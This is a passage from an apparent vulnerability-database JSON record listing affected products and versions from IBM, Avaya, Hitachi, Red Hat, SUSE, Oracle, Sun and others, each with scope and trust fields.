"trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "cosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "cosminexus client 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-02" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "ucosminexus primary server base (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer standard 06-71-/m", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jdk 1.5.0 11-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "web sphere real time service refresh", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "36" }, { "model": "cosminexus developer light 06-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0108-20" }, { "model": "enterprise linux workstation supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "cosminexus application server enterprise 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux enterprise desktop sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "cosminexus developer 05-02-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus application server enterprise 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus client 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "linux enterprise server sp4 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server standard 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus developer standard 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus primary server base 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 08", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "cosminexus application server standard 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer 05-05-/r", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-60" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server enterprise 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "jrockit r27.8.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus developer professional 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cms r17ac.g", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "cosminexus client 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "cosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-00" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "forms viewer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "ucosminexus client (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server enterprise 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server enterprise 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cms r17ac.h", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus studio 05-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus studio 05-05-/o", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.10" }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "jrockit r27.6.0-50", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.015" }, { "model": "cosminexus application server 05-02-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-50" }, { "model": "jdk 01", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "cosminexus studio 05-01-/l", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus client 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r27.6.5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "linux enterprise software development kit sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus application server enterprise (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "enterprise linux server eus 6.5.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "forms viewer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "linux enterprise server sp2 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "ucosminexus developer standard 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-07-10" }, { "model": "websphere sensor events", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "ucosminexus client for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-50" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.10" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "ucosminexus application server standard-r (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "cosminexus developer standard 06-50-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "cosminexus developer professional 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux enterprise server sp3 for vmware", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "ucosminexus application server standard 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "cosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "jdk 1.5.0.0 04", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-71" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "runtimes for java technology", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "forms viewer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.6" }, { "model": "cosminexus client 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus primary server base 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux enterprise server sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "runtimes for java technology", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "jdk", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.0" }, { "model": "ucosminexus client 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jdk 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "runtimes for java technology sr8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0109-00" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-01" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2.1" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "cosminexus developer professional 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r28.0.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-00" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "cosminexus primary server base 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "cosminexus developer light 06-50-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server enterprise 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-71" }, { "model": "forms viewer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.3" }, { "model": "jrockit r27.6.7", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "jrockit r27.6.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "jre 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "cosminexus client 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "13.10" }, { "model": "ucosminexus developer (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0107-00" }, { "model": "ucosminexus client 06-71-/m", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2143" }, { "model": "cosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "ucosminexus application server enterprise 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "web sphere real time service refresh", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "37" }, { "model": "aura conferencing sp1 standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "cosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-00" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.1" }, { "model": "ucosminexus service platform (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus service architect (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "ucosminexus application server express (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus primary server base 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "runtimes for java technology", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "enterprise linux hpc node supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "cosminexus developer professional 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer professional 06-70-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer 05-05-/o", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.13" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "cosminexus developer professional )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0107-00" }, { "model": "jdk 0 03", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus client for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "manager", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "111.7" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-60" }, { "model": "java se embedded 7u45", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus developer light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus application server 05-00-/s", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus primary server base 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus client 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "ucosminexus application server standard (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus developer standard 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "ucosminexus operator (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "cosminexus application server enterprise 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-07-00" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "websphere sensor events", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "cosminexus application server 05-05-/r", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server standard 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-70" }, { "model": "jrockit r27.1.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "cosminexus studio 05-02-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "enterprise linux supplementary server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "jrockit 